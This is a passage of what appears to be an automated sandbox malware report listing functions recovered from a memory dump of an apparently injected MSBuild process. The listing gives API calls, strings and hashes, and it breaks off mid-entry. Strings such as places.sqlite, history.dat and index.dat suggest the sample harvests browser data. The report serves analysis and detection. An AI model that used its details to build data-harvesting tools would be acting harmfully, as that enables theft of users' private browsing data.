                                                                                                                                            Function 004148B6 Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • FindResourceW.KERNELBASE(?,?,?), ref: 004148C3
                                                                                                                                            • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                                                                                                                                            • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                                                                                                                                            • LockResource.KERNEL32(00000000), ref: 004148EF
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Resource$FindLoadLockSizeof
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3473537107-0
                                                                                                                                            • Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                                                                            • Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
                                                                                                                                            • Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                                                                            • Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
                                                                                                                                            Function 0043A9F6 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 979COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: memset
                                                                                                                                            • String ID: only a single result allowed for a SELECT that is part of an expression
                                                                                                                                            • API String ID: 2221118986-1725073988
                                                                                                                                            • Opcode ID: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                                                                                                            • Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
                                                                                                                                            • Opcode Fuzzy Hash: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                                                                                                            • Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96
                                                                                                                                            Function 004125B6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00412966,/deleteregkey,/savelangfile), ref: 004125C3
                                                                                                                                            • DeleteObject.GDI32(00000000), ref: 004125E7
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ??3@DeleteObject
                                                                                                                                            • String ID: r!A
                                                                                                                                            • API String ID: 1103273653-628097481
                                                                                                                                            • Opcode ID: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                                                                                                            • Instruction ID: d381ae2e1f6c469d4091c7bd434485f036f098756071eb86a226830a39d2e28c
                                                                                                                                            • Opcode Fuzzy Hash: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                                                                                                            • Instruction Fuzzy Hash: 72E04F75000302DFD7115F26E400782B7F5FF85315F11455EE89497151EBB96164CE19
                                                                                                                                            Function 0040D092 Relevance: 5.1, APIs: 4, Instructions: 51COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,00402E6F), ref: 0040D0CC
                                                                                                                                            • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,00402E6F), ref: 0040D0EA
                                                                                                                                            • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D108
                                                                                                                                            • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D126
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ??2@
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1033339047-0
                                                                                                                                            • Opcode ID: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                                                                                                            • Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
                                                                                                                                            • Opcode Fuzzy Hash: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                                                                                                            • Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49
                                                                                                                                            Function 00444B06 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 108COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                                                                                              • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                                                                              • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                                                                              • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                                                                                              • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                                                                              • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                                                                              • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                                                                                            • memcmp.MSVCRT(?,0044EC68,00000010,?,00000000,?), ref: 00444BA5
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AddressProc$memcmp
                                                                                                                                            • String ID: $$8
                                                                                                                                            • API String ID: 2808797137-435121686
                                                                                                                                            • Opcode ID: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                                                                            • Instruction ID: 2c4e4273d6b09173b98ec99ba1a72f96ebc6587eba5c15334d9e54441f883a66
                                                                                                                                            • Opcode Fuzzy Hash: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                                                                            • Instruction Fuzzy Hash: 04314171A00209ABEB10DFA6CDC1BAEB7B9FF88314F11055AE515A3241D778ED048B69
                                                                                                                                            Function 00430737 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 94COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            • duplicate column name: %s, xrefs: 004307FE
                                                                                                                                            • too many columns on %s, xrefs: 00430763
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: duplicate column name: %s$too many columns on %s
                                                                                                                                            • API String ID: 0-1445880494
                                                                                                                                            • Opcode ID: d71f1f637ec18e5f8a62c501b2db333135d8de05f3daff8c641ff98159ef3fea
                                                                                                                                            • Instruction ID: 332525b9e829d337f3b342900587a6bcab00951879d739311f42b30c77ca79e1
                                                                                                                                            • Opcode Fuzzy Hash: d71f1f637ec18e5f8a62c501b2db333135d8de05f3daff8c641ff98159ef3fea
                                                                                                                                            • Instruction Fuzzy Hash: 5E314735500705AFCB109F55C891ABEB7B5EF88318F24815BE8969B342C738F841CB99
                                                                                                                                            Function 0040E4B2 Relevance: 4.6, APIs: 3, Instructions: 87fileCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                                                              • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                                                              • Part of subcall function 0040E01E: DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                                                                                              • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                                                              • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                                                                              • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                                                                              • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                                                                              • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                                                                              • Part of subcall function 0040E01E: CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                                                                                                            • CloseHandle.KERNELBASE(000000FF,000000FF,00000000,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E582
                                                                                                                                              • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                                                                                                                                              • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                                                                                                                                              • Part of subcall function 0040E2AB: memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,76E22EE0), ref: 0040E3EC
                                                                                                                                            • DeleteFileW.KERNELBASE(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                                                                                                                                            • CloseHandle.KERNEL32(000000FF,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5CA
                                                                                                                                              • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                                                                                                                                              • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                                                                                                                                              • Part of subcall function 0040E175: free.MSVCRT ref: 0040E28B
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: File$Handle$Close$ProcessViewmemset$CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintffreememcpywcschr
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1979745280-0
                                                                                                                                            • Opcode ID: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                                                                                                            • Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
                                                                                                                                            • Opcode Fuzzy Hash: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                                                                                                            • Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58
                                                                                                                                            Function 00403A16 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 67COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                                                                                                                                              • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                                                                                                                                              • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                                                                                                                                              • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                                                                                                                                            • memset.MSVCRT ref: 00403A55
                                                                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                              • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                              • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                              • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                                                              • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                                                              • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: memsetwcscatwcslen$free$AttributesFilememcpywcscpy
                                                                                                                                            • String ID: history.dat$places.sqlite
                                                                                                                                            • API String ID: 2641622041-467022611
                                                                                                                                            • Opcode ID: ff38290cf6d73649d3c52fc0ad95bc2cdf601f157f84f60878f9098853983ee3
                                                                                                                                            • Instruction ID: 4d52d99a2018a06e8b3479be55870673e402391ac5db5fe9af26a684ed702786
                                                                                                                                            • Opcode Fuzzy Hash: ff38290cf6d73649d3c52fc0ad95bc2cdf601f157f84f60878f9098853983ee3
                                                                                                                                            • Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69
                                                                                                                                            Function 004175ED Relevance: 4.5, APIs: 3, Instructions: 49fileCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                                                                              • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                                                                                                                                              • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                                                                                                                                            • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
                                                                                                                                            • GetLastError.KERNEL32 ref: 00417627
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorLast$File$PointerRead
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 839530781-0
                                                                                                                                            • Opcode ID: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                                                                                                            • Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
                                                                                                                                            • Opcode Fuzzy Hash: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                                                                                                            • Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA
                                                                                                                                            Function 0040C1D3 Relevance: 4.5, APIs: 1, Strings: 2, Instructions: 45COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FileFindFirst
                                                                                                                                            • String ID: *.*$index.dat
                                                                                                                                            • API String ID: 1974802433-2863569691
                                                                                                                                            • Opcode ID: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                                                                                                            • Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
                                                                                                                                            • Opcode Fuzzy Hash: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                                                                                                            • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
                                                                                                                                            Function 00417570 Relevance: 4.5, APIs: 3, Instructions: 30COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                                                                            • GetLastError.KERNEL32 ref: 004175A2
                                                                                                                                            • GetLastError.KERNEL32 ref: 004175A8
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorLast$FilePointer
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1156039329-0
                                                                                                                                            • Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                                                                            • Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
                                                                                                                                            • Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                                                                            • Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
                                                                                                                                            Function 0040A02C Relevance: 4.5, APIs: 3, Instructions: 26filetimeCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                                                                            • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                                                            • CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: File$CloseCreateHandleTime
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3397143404-0
                                                                                                                                            • Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                                                                            • Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
                                                                                                                                            • Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                                                                            • Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
                                                                                                                                            Function 00409A45 Relevance: 4.5, APIs: 3, Instructions: 26COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                                                                            • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                                                            • GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Temp$DirectoryFileNamePathWindows
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1125800050-0
                                                                                                                                            • Opcode ID: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                                                                                            • Instruction ID: b144c37017a21c6b5a3d1d2b3cfc872714830df517851edcd0bc871ed666fd71
                                                                                                                                            • Opcode Fuzzy Hash: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                                                                                            • Instruction Fuzzy Hash: ACE0927A500218A7DB109B61DC4DFC777BCFB45304F0001B1B945E2161EB349A848BA8
                                                                                                                                            Function 004175B7 Relevance: 4.5, APIs: 2, Strings: 1, Instructions: 24sleepCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • Sleep.KERNEL32(00000064), ref: 004175D0
                                                                                                                                            • CloseHandle.KERNELBASE(?,00000000,?,0045DBC0,00417C24,?,00000000,00000000,?,00417DE1,?,00000000), ref: 004175D9
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CloseHandleSleep
                                                                                                                                            • String ID: }A
                                                                                                                                            • API String ID: 252777609-2138825249
                                                                                                                                            • Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                                                                            • Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
                                                                                                                                            • Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                                                                            • Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524
                                                                                                                                            Function 004099F4 Relevance: 3.8, APIs: 3, Instructions: 38COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • malloc.MSVCRT ref: 00409A10
                                                                                                                                            • memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                                                                            • free.MSVCRT ref: 00409A31
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: freemallocmemcpy
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3056473165-0
                                                                                                                                            • Opcode ID: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                                                                                                                            • Instruction ID: 1240433d41d023da9ba75aa62d017d874606d7cfbee4c78203c9aa8101697722
                                                                                                                                            • Opcode Fuzzy Hash: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                                                                                                                            • Instruction Fuzzy Hash: 88F0E9727092219FC708AE75A98180BB79DAF55314B12482FF404E3282D7389C50CB58
                                                                                                                                            Function 00437371 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 243COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: d
                                                                                                                                            • API String ID: 0-2564639436
                                                                                                                                            • Opcode ID: b7bdb433cc21537495b9453c0ef7e1d4136cbb83a95eb0b3518e055101e122e1
                                                                                                                                            • Instruction ID: 98c7df9677761670a5e344a1c7628a8b006f0a2246df1cf6f5c5c4488f8f87fd
                                                                                                                                            • Opcode Fuzzy Hash: b7bdb433cc21537495b9453c0ef7e1d4136cbb83a95eb0b3518e055101e122e1
                                                                                                                                            • Instruction Fuzzy Hash: 4591ABB0508302AFDB20DF19D88196FBBE4BF88358F50192FF88497251D778D985CB9A
                                                                                                                                            Function 0041EED2 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 174COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: memset
                                                                                                                                            • String ID: BINARY
                                                                                                                                            • API String ID: 2221118986-907554435
                                                                                                                                            • Opcode ID: 423c094908dc07756a2ef734edd9c41c0411f3bff0f864234720e07ca5cd074c
                                                                                                                                            • Instruction ID: 089a0534c11c2c8a1092ab46fa13594887108ded84822111f9e073e703b485f9
                                                                                                                                            • Opcode Fuzzy Hash: 423c094908dc07756a2ef734edd9c41c0411f3bff0f864234720e07ca5cd074c
                                                                                                                                            • Instruction Fuzzy Hash: 41518B71A047059FDB21CF69C881BEA7BE4EF48350F14446AF849CB342E738D995CBA9
                                                                                                                                            Function 0041268E Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 72COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _wcsicmp
                                                                                                                                            • String ID: /stext
                                                                                                                                            • API String ID: 2081463915-3817206916
                                                                                                                                            • Opcode ID: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                                                                                                            • Instruction ID: 10e6e7fbaeb1b3fbdbf907bfc38f809d5841ace5bac79d7196eddb000c1bc607
                                                                                                                                            • Opcode Fuzzy Hash: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                                                                                                            • Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
                                                                                                                                            Function 00406B90 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 56COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _wcsicmp
                                                                                                                                            • String ID: .v
                                                                                                                                            • API String ID: 2081463915-2572790428
                                                                                                                                            • Opcode ID: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                                                                                                                            • Instruction ID: 44e68c08f8902dbc9d3bec9e3d7b81d72528a2b8c41660eeece459a1934edfa0
                                                                                                                                            • Opcode Fuzzy Hash: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                                                                                                                            • Instruction Fuzzy Hash: 0C118CB1600205AFD710DF65C8809AAB7F8FF44314F11843EE55AE7240EB34F9658B68
                                                                                                                                            Function 0040CC26 Relevance: 3.1, APIs: 2, Instructions: 53COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
